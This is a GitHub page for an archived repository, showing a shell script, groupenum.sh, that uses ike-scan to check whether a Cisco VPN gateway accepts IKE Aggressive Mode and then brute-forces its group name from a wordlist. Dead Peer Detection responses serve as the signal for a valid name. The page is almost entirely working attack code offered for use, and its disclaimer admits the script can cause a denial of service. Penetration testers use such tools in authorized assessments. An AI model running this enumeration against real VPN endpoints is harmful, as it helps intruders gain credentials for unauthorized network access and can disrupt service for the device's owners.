This repository has been archived by the owner on Aug 7, 2020. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 17
/
groupenum.sh
57 lines (54 loc) · 2.04 KB
/
groupenum.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/bin/sh
######################################################################################
#Cisco group name enumeration
#Requires: ike-scan http://www.nta-monitor.com/tools-resources/security-tools/ike-scan
#Usage: ./groupenum.sh target wordlist.txt
#Disclaimer: I accept no responsibility for any issues caused by running this tool,
#run at your own risk. i.e. it's not my fault if you cause a DoS condition, modify the sleep time accordingly.
######################################################################################
if [ $# -lt 2 ]; then
printf "Usage: ./groupenum.sh target wordlist.txt\n "
exit 0
fi
#Determine if device is vulnerable
echo "[+]Checking if Aggressive Mode is enabled..."
if ike-scan $1 -M -A --id=admin | grep -i "aggressive"
then
echo "[+]Aggressive mode enabled, checking device is a Cisco endpoint..."
if ike-scan $1 -M -A --id=admin | grep -i "cisco"
then
echo "[+]Confirmed Cisco endpoint, checking DPD response..."
if ike-scan $1 -M -A --id=thisgroupnamedoesnotexit234585 | grep -i "dead peer"
then echo "[-]Device does not appear to be vulnerable"
exit 0
else
echo "[+]Device appears to be vulnerable"
continue
fi
#Brute force groupname
echo "[+]Brute forcing group name with:" $2
while read file
do
if ike-scan $1 -M -A --id=$file | grep -i "dead peer" && sleep 0.4
then echo "False alarm checking for group" $file
if ike-scan $1 -M -A --id=$file | grep -i "dead peer"
then echo "[+]Group name =" $file
exit 0
fi
fi
done < $2
echo "[+]Trying IP address as group name:" $1
if ike-scan $1 -M -A --id=$1 | grep -i "dead peer"
then echo "[+]Group name =" $1
exit 0
fi
else
echo "[-]Not a Cisco endpoint"
fi
else
echo "[-]Aggressive mode handshake not returned, try the script a few more times"
echo "If you know the device accepts aggressive mode modify the script to use the correct transform set by modifying line 8."
echo "Example: ike-scan $1 -M -A --trans=7/256,2,1,2 --id=test"
exit 0
fi
echo "[-]Group name not found - try a better wordlist"